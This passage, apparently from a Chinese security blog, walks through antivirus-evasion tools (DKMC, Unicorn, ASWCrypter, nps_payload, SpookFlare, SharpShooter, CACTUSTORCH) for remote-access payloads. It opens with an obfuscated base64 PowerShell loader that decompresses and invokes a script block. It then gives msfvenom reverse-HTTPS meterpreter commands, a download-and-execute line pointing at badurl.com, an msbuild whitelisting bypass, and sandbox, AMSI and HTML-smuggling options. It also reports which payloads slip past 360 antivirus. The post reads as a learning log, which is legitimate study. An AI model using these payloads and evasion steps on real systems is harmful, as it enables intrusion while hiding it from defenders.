dQBWAGcAdAAvAHkAdgAhAEcAVgBhAFUAZwA1AEYAbwA5AFcAVgBvAG4AdgBXAE0AagBqADAAbwAyAEcAZwB1AGsATQB5ADYAcgBQAHIAeAB1AFEATQBYACEAMABlAEQAdwBDAEsAdABZADYAbgAhAHQAZgBlADIAUgBoAFgAbQBqAFEAaABXADEATwBVAEkASgBmADgAWABPADcAdgBmAGIATABKAHMAKwBCAGQAbQAyAGQAVgBkAFAAKwAvAGoAZQBzAEYAWQBWAFEAUQBlAGUAZQBRAGoAeABYAG8AZABPADgAMwAyADQAMgAwAGUAYQBhADkAegB0AE4AdQArAGIAeQA5ADIAdgBzAGkAbQBSAHAAUABRAC8AbgBhAEsAcwBzAGsARgBxAGQAaABPAGUAVABGAEQAIQB1AC8ASAA3AG4ANABYACsAIQBzAGQAUgBuAGkASwAvAGcAdAB6AEQAVwBiAFgALwBUACsAeQA1AG8AbQAwADYANQAvAEYAZgB0AEwAeAB2ACsARQBjAGoALwBEAG8ARQBSAFoAUQByAEQAUABiAFEAbQBEAHMAWABlAGUAIQBPAEkAVQBqAG8AcgBSADIAMwBPAEUAcQBwAGkAVgBqADcANgAxAG4ATwBPAE8AKwBNAE0AagArAEQATgBEAGYATgAhAFUAOQBtAGYAawBaAFgAVgBwACsAdwBCAHIAegB4AHcAUwAvAGIAcwAxAFoATQAyAFYAVgBTAHEAeABrADgAeAB4AFgAdABTAG8AZwA5AEMAeQArAGkAeQBoAFUAMwA2AFIAOQBkAEUAZgA1AEUAbgAwAGsAIQAhAE8AdQBsADIARwB5ADkATQBjAHAANQBwAFAAeQBKAEcAYwBlAEYANwBKAEgAZQA0AGgAagB6ADcAawBWAHkAIQBEADMAagB2AGEAWAB3AFcAMAA5AHgAdgAhAEkAKwBPADEAWgBuAHkARQBmAE8AOAB2AFAAcwB2AGEAYQBvAFoARwBUAFEASwAhACEAIQA9ACIALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIAQQAiACkAKQApADsAIAAkAHIAVQBlAFIAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQASABhAHAAYgBMAFIAdABUACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAIABbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACQAcgBVAGUAUgApAC4ASQBuAHYAbwBrAGUAKAApAAoA</span><br></pre></td></tr></table></figure>



<h4 id="第五步"><a href="#第五步" class="headerlink" title="第五步"></a>第五步</h4><p><code>web</code>直接<code>run</code>，此时Win7已经可以通过上一步的url下载图片了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212203907952.png" alt="image-20220212203907952"></p>
<h3 id="运行效果"><a href="#运行效果" class="headerlink" title="运行效果"></a>运行效果</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212204141231.png" alt="image-20220212204141231"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212204501644.png" alt="image-20220212204501644"></p>
<p>360全家桶对bmp图片进行扫描没有问题，但是执行ps脚本会警告</p>
<h3 id="小结-5"><a href="#小结-5" class="headerlink" title="小结"></a>小结</h3><p>DKMC通过把shellcode注入到bmp文件中再利用powershell来执行，虽然图片没有被查杀但是powershell的行为容易被杀软注意到，后续可以对ps代码进行混淆来进一步利用</p>
<h2 id="Unicorn"><a href="#Unicorn" class="headerlink" title="Unicorn"></a>Unicorn</h2><h3 id="安装-6"><a href="#安装-6" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/trustedsec/unicorn.git</span><br></pre></td></tr></table></figure>

<h3 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h3><p>可生成ps1、macro、hta、dde等代码和文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">Usage: python unicorn.py payload reverse_ipaddr port &lt;optional hta or macro, crt&gt;</span><br><span class="line">PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443</span><br><span class="line">PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe</span><br><span class="line">PS Down/Exec Macro: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe macro</span><br><span class="line">Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro</span><br><span class="line">Macro Example CS: python unicorn.py &lt;cobalt_strike_file.cs&gt; cs macro</span><br><span class="line">HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta</span><br><span class="line">HTA SettingContent-ms Metasploit: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms</span><br><span class="line">HTA Example CS: python unicorn.py &lt;cobalt_strike_file.cs&gt; cs hta</span><br><span class="line">HTA Example SettingContent-ms: python unicorn.py &lt;cobalt_strike_file.cs cs ms</span><br><span class="line">HTA Example SettingContent-ms: python unicorn.py &lt;patth_to_shellcode.txt&gt;: shellcode ms</span><br><span class="line">DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde</span><br><span class="line">CRT Example: python unicorn.py &lt;path_to_payload/exe_encode&gt; crt</span><br><span class="line">Custom PS1 Example: python unicorn.py &lt;path to ps1 file&gt;</span><br><span class="line">Custom PS1 Example: python unicorn.py &lt;path to ps1 file&gt; macro 500</span><br><span class="line">Cobalt Strike Example: python unicorn.py &lt;cobalt_strike_file.cs&gt; cs (export CS in C# format)</span><br><span class="line">Custom Shellcode: python unicorn.py &lt;path_to_shellcode.txt&gt; shellcode (formatted 0x00 or metasploit)</span><br><span class="line">Custom Shellcode HTA: python unicorn.py &lt;path_to_shellcode.txt&gt; shellcode hta (formatted 0x00 or metasploit)</span><br><span class="line">Custom Shellcode Macro: python unicorn.py &lt;path_to_shellcode.txt&gt; shellcode macro (formatted 0x00 or metasploit)</span><br><span class="line">Generate .SettingContent-ms: python unicorn.py ms</span><br><span class="line">Help Menu: python unicorn.py --help</span><br></pre></td></tr></table></figure>

<h3 id="使用-6"><a href="#使用-6" class="headerlink" title="使用"></a>使用</h3><p>生成payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python unicorn.py windows/meterpreter/reverse_https 192.168.221.128 4444</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212211144925.png" alt="image-20220212211144925"></p>
<p>生成<code>powershell_attack.txt</code>和<code>unicorn.rc</code></p>
<p>直接用<code>msfconsole -r unicorn.rc</code>快速启动MSF</p>
<p>在目标机执行powershell脚本</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212211726185.png" alt="image-20220212211726185"></p>
<p>360直接阻止powershell运行了</p>
<h3 id="小结-6"><a href="#小结-6" class="headerlink" title="小结"></a>小结</h3><p>可生成代码多样，但是不经过混淆直接使用很难免杀</p>
<h2 id="Python-Rootkit"><a href="#Python-Rootkit" class="headerlink" title="Python-Rootkit"></a>Python-Rootkit</h2><p>（待补）</p>
<h2 id="ASWCrypter"><a href="#ASWCrypter" class="headerlink" title="ASWCrypter"></a>ASWCrypter</h2><p>该工具使用python脚本对hta代码进行编码处理，生成新的hta后门</p>
<h3 id="安装-7"><a href="#安装-7" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git</span><br></pre></td></tr></table></figure>

<h3 id="使用-7"><a href="#使用-7" class="headerlink" title="使用"></a>使用</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod +x ASWCrypter.sh</span><br><span class="line">./ASWCrypter.sh</span><br></pre></td></tr></table></figure>

<p>选择<code>G</code>，generate</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215442859.png" alt="image-20220212215442859"></p>
<p>配置LHOST、LPORT</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215316449.png" alt="image-20220212215316449"></p>
<p>如果生成payload时报错可以<code>mkdir output</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215104051.png" alt="image-20220212215104051"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215908266.png" alt="image-20220212215908266"></p>
<p>执行被360安全卫士警告</p>
<h3 id="小结-7"><a href="#小结-7" class="headerlink" title="小结"></a>小结</h3><p>静态免杀效果不错，但是调用powershell的行为会被警告</p>
<h2 id="nps-payload"><a href="#nps-payload" class="headerlink" title="nps_payload"></a>nps_payload</h2><p><code>nps_payload</code>可以⽣成基于msbuild的xml⽂件和独⽴执⾏的hta⽂件，并对xml⽂件和hta⽂件做了⼀定的混淆免杀，以达到免杀目的</p>
<h3 id="安装-8"><a href="#安装-8" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/trustedsec/nps_payload</span><br><span class="line">pip install -r requirements.txt</span><br></pre></td></tr></table></figure>

<h3 id="使用-8"><a href="#使用-8" class="headerlink" title="使用"></a>使用</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212221042746.png" alt="image-20220212221042746"></p>
<p>只需要使用<code>msbuild_nps.xml</code></p>
<p>需要用<code>msbuild.exe</code>，<code>msbuild.exe</code>在windows中的一般路径<code>C:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe</code></p>
<p>Windows</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml</span><br></pre></td></tr></table></figure>

<p>Kali</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfconsole -r msbuild_nps.rc</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212225126509.png" alt="image-20220212225126509"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212221714694.png" alt="image-20220212221714694"></p>
<p>动静态均未被查杀</p>
<h3 id="小结-8"><a href="#小结-8" class="headerlink" title="小结"></a>小结</h3><p>基于白名单程序<code>msbuild.exe</code>执行payload，同时<code>nps_payload</code>对生成的文件进行了混淆，两者结合免杀效果确实强力</p>
<h2 id="HERCULES"><a href="#HERCULES" class="headerlink" title="HERCULES"></a>HERCULES</h2><p>（安装问题，待补）</p>
<h2 id="SpookFlare"><a href="#SpookFlare" class="headerlink" title="SpookFlare"></a>SpookFlare</h2><h3 id="安装-9"><a href="#安装-9" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/hlldz/SpookFlare.gitpip install -r requirements.txt</span><br></pre></td></tr></table></figure>

<h3 id="使用-9"><a href="#使用-9" class="headerlink" title="使用"></a>使用</h3><p>直接<code>python spookflare.py</code>执行</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212230929914.png" alt="image-20220212230929914"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212231102345.png" alt="image-20220212231102345"></p>
<blockquote>
<p>支持四种payload</p>
<ol>
<li>msf的exe程序(自编译)</li>
<li>msf的ps1脚本(免杀混淆)</li>
<li>hta</li>
<li>office宏代码</li>
</ol>
</blockquote>
<p><code>info</code>可以查看需要配置的参数</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212232114869.png" alt="image-20220212232114869"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212232546093.png" alt="image-20220212232546093"></p>
<p>参数配置完毕以后生成C#文件，需要用<code>csc.exe</code>编译成exe</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe xxxx.cs</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212232815419.png" alt="image-20220212232815419"></p>
<p>360全家桶第一次扫描没有查杀，过了一会被360杀毒查杀</p>
<h3 id="小结-9"><a href="#小结-9" class="headerlink" title="小结"></a>小结</h3><p>SpookFlare会对每次生成的payload进行代码混淆处理来增加免杀概率，exe文件免杀效果一般，hta可过静态查杀</p>
<h2 id="SharpShooter"><a href="#SharpShooter" class="headerlink" title="SharpShooter"></a>SharpShooter</h2><p>SharpShooter是武器化的Payload生成框架，支持反沙箱分析、分阶段和无阶段的Payload执行，并能够规避入口监测。</p>
<h3 id="安装-10"><a href="#安装-10" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/mdsecactivebreach/SharpShooter</span><br><span class="line">pip install -r requirements.txt</span><br></pre></td></tr></table></figure>

<h3 id="使用-10"><a href="#使用-10" class="headerlink" title="使用"></a>使用</h3><p>执行<code>python SharpShooter.py -h</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212233613004.png" alt="image-20220212233613004"></p>
<blockquote>
<p> -h, <em>–help</em> 帮助菜单</p>
<p> <em>–stageless</em> 创建一个不分阶段的<em>payload</em></p>
<p> <em>–dotnetver <ver></em> 制定<em>dotnet</em>的版本，<em>2</em>或者<em>4</em></p>
<p> <em>–com <com> COM</em> 分阶段技术*:* 如<em>outlook, shellbrowserwin,</em></p>
<p> <em>wmi, wscript, xslremote</em>等</p>
<p> <em>–awl <awl></em> 使用程序白名单技术*: wmic, regsvr32*</p>
<p> <em>–awlurl <awlurl></em> 指定取回 <em>XSL/SCT payload</em>的<em>url</em>地址</p>
<p> <em>–payload <format> Payload</em> 类型*: hta, js, jse, vbe, vbs, wsf,*</p>
<p> <em>macro, slk</em></p>
<p> <em>–sandbox <types></em> 绕过沙盒技术*:*</p>
<p> [1] Key <strong>to Domain</strong> (e.g. 1=CONTOSO)</p>
<p> [2] Ensure <strong>Domain</strong> Joined</p>
<p> [3] <strong>Check for</strong> Sandbox Artifacts</p>
<p> [4] <strong>Check for</strong> Bad MACs</p>
<p> [5] <strong>Check for</strong> Debugging</p>
<p> <em>–amsi <amsi></em> 使用<em>AMSI</em>绕过技术*: amsienable*</p>
<p> <em>–delivery <type></em> 分发方法*: web, dns, both*</p>
<p> <em>–rawscfile <path></em> 指定生成<em>payload</em>的<em>shellcode</em></p>
<p> <em>–shellcode</em> 使用内置的<em>shellcode</em></p>
<p> <em>–scfile <path></em> 指定<em>C#<em>的</em>shellcode</em>的路径</p>
<p> <em>–refs <refs></em> 指定<em>C#<em>需要的依赖文件，如</em>mscorlib.dll</em>等</p>
<p> <em>–namespace <ns></em> 指定<em>C#<em>的</em>Namespace</em>，如<em>Foo.bar</em></p>
<p> <em>–entrypoint <ep></em> 指定<em>C#<em>需要执行的方法，如</em>Main</em></p>
<p> <em>–web <web></em> 指定<em>web</em>分发的地址</p>
<p> <em>–dns <dns></em> 指定<em>Dns</em>分发的地址</p>
<p> <em>–output <output></em> 输出文件的名称</p>
<p> <em>–smuggle HTML</em>内的隐藏文件</p>
<p> <em>–template <tpl></em> 指定生成<em>html</em>的<em>template</em>文件 <em>(e.g. mcafee)</em></p>
</blockquote>
<p>官方文档里提供了各种payload的生成命令，使用前可以查看一下</p>
<p>接下来尝试创建一个hta后门</p>
<p>msfvenom生成shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f raw -o shellcode.txt</span><br></pre></td></tr></table></figure>

<h4 id=""><a href="#" class="headerlink" title=""></a></h4><p>用SharpShooter创建hta后门</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./shellcode.txt --sandbox 4 --smuggle --template mcafee</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215151041983.png" alt="image-20220215151041983"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215151355065.png" alt="image-20220215151355065"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215151612441.png" alt="image-20220215151612441"></p>
<p>运行被查杀</p>
<h3 id="小结-10"><a href="#小结-10" class="headerlink" title="小结"></a>小结</h3><p>这个框架比较复杂，功能强大。在本次测试只是简单的使用了其中的一些功能，免杀效果比较一般，可能是比较出名或者太老了，但是默认生成的payload还可以用其他的方法进行进一步免杀后效果应该会有所提升</p>
<p>资料：<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/100533">https://www.anquanke.com/post/id/100533</a></p>
<h2 id="CACTUSTORCH"><a href="#CACTUSTORCH" class="headerlink" title="CACTUSTORCH"></a>CACTUSTORCH</h2><h3 id="安装-11"><a href="#安装-11" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/mdsecactivebreach/CACTUSTORCH</span><br></pre></td></tr></table></figure>

<h3 id="使用-11"><a href="#使用-11" class="headerlink" title="使用"></a>使用</h3><p>先用MSF或者CS生成一个32位shellcode并用base64编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f raw -o payload.bin</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215152616661.png" alt="image-20220215152616661"></p>
<p>复制Base64编码后的shellcode到CACTUSTORCH.js中的<code>code</code>部分</p>
<p>PS：上面的<code>binary</code>参数也可以替换，例如：计算器（calc.exe）</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215152829223.png" alt="image-20220215152829223"></p>
<p>目标机执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wscript.exe CACTUSTORCH.js</span><br></pre></td></tr></table></figure>

<p>执行被360杀毒拦截</p>
<h3 id="小结-11"><a href="#小结-11" class="headerlink" title="小结"></a>小结</h3><p>本工具和上一个测试的开发者相同，测试效果不太行，但是同样的可以尝试对脚本2代码进行二次免杀来提高免杀能力</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>本篇多各种免杀工具进行了学习，并没有把所有功能都一一尝试过去，安装过程中出现的各种奇奇怪怪的问题总是令人抓狂，查了一堆文章水平也是参差不齐，过程有时枯燥有时免杀成功又会非常兴奋，总的来说还是有收获的</p>
<p>杀软在不断更新迭代，免杀技术也在不断进步创新，两者在互相碰撞中发展，通过使用不断出现的免杀工具，学习工具免杀的原理和思路，也是了解免杀技术发展的一种方法</p>
<p>最后，安装问题出现的工具后续有空会补上</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
              <a href="/tags/%E5%85%8D%E6%9D%80/" rel="tag"># 免杀</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/02/06/%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E6%A6%82%E5%BF%B5/" rel="prev" title="远控免杀——概念">
                  <i class="fa fa-chevron-left"></i> 远控免杀——概念
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/02/22/%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E7%BC%96%E8%AF%91%E7%AF%87/" rel="next" title="远控免杀——编译篇">
                  远控免杀——编译篇 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Jason Tu</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




  

  <script class="next-config" data-name="enableMath" type="application/json">true</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"all","js":{"url":"https://cdn.jsdelivr.net/npm/mathjax@3.2.0/es5/tex-mml-chtml.js","integrity":"sha256-r+3itOMtGGjap0x+10hu6jW/gZCzxHsoKrOd7gyRSGY="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>



</body>
</html>
